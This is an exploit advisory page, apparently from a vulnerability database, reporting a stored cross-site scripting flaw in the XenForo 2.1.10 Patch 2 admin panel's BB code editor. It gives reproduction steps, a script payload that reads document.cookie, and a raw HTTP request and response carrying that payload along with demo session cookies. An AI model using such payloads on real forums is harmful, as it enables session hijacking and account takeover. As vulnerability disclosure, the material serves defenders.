XenForo 2.1.10 Patch 2 Cross Site Scripting

2020.08.17
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: XenForo v2.1.10 Patch 2 Stored XSS # Date:16.08.2020 # Author: Vincent666 ibn Winnie # Software Link: https://xenforo.com/demo/ # Tested on: Windows 10 # Web Browser: Mozilla Firefox # Blog :https://pentest-vincent.blogspot.com/ # PoC :https://pentest-vincent.blogspot.com/2020/08/xenforo-v2110-patch-2-stored-xss.html PoC: I use demo XenForo Admin panel for test. Create demo site: https://xenforo.com/demo/ Login:admin Password:admin Go to the Admin panel -> open Content-> bb codes->Add bb code Put xss code in field "Title" or "Description" or other and save this. Xss code: """><script>alert(document.cookie)</script><script>alert("Stored XSS XenForo")</script> We have a stored xss. Picture: https://imgur.com/a/sfE6DwZ Video: https://www.youtube.com/watch?v=eIJwP0Y1luQ&feature=youtu.be https://27ff066882409b73.demo-xenforo.com/2110p2/admin.php?bb-codes/save Host: 27ff066882409b73.demo-xenforo.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate, br Referer: https://27ff066882409b73.demo-xenforo.com/2110p2/admin.php?bb-codes/add X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------3006497114009 Content-Length: 2530 Origin: https://27ff066882409b73.demo-xenforo.com Connection: keep-alive Cookie: 2110p2_csrf=R0-3YLvAUaqs1EVL; 2110p2_user=1%2CK6XXrhPx4KhqByRM3saOr3gOzYJ0_-8cA-qKDEcw; 2110p2_session=m0BX5XYtnGIc5HogKPEcY2jwdZrOd95u; 2110p2_session_admin=bru_eXQSO-jIXtAaESSJDoD69BLcIiVd bb_code_id=test&title=""><script>alert("Stored XSS XenForo")</script>&desc=&bb_code_mode=replace&has_option=no&replace_html=&callback_class=&callback_method=&editor_icon_type=&example=&output=&allow_signature=1&active=1&addon_id=&option_regex=&trim_lines_after=0&replace_html_email=&replace_text=&_xfToken=1597585880,aa740358187e6579a880755adc20d9ba,1597585880,aa740358187e6579a880755adc20d9ba&_xfRequestUri=/2110p2/admin.php?bb-codes/add&_xfWithData=1&_xfResponseType=json POST: HTTP/1.1 200 OK Date: Sun, 16 Aug 2020 13:51:29 GMT Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/7.2.12 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Last-Modified: Sun, 16 Aug 2020 13:51:29 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: private, no-cache, max-age=0 Content-Encoding: gzip Vary: Accept-Encoding Content-Length: 254 Keep-Alive: timeout=2, max=100 Connection: Keep-Alive Content-Type: application/json; charset=utf-8


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top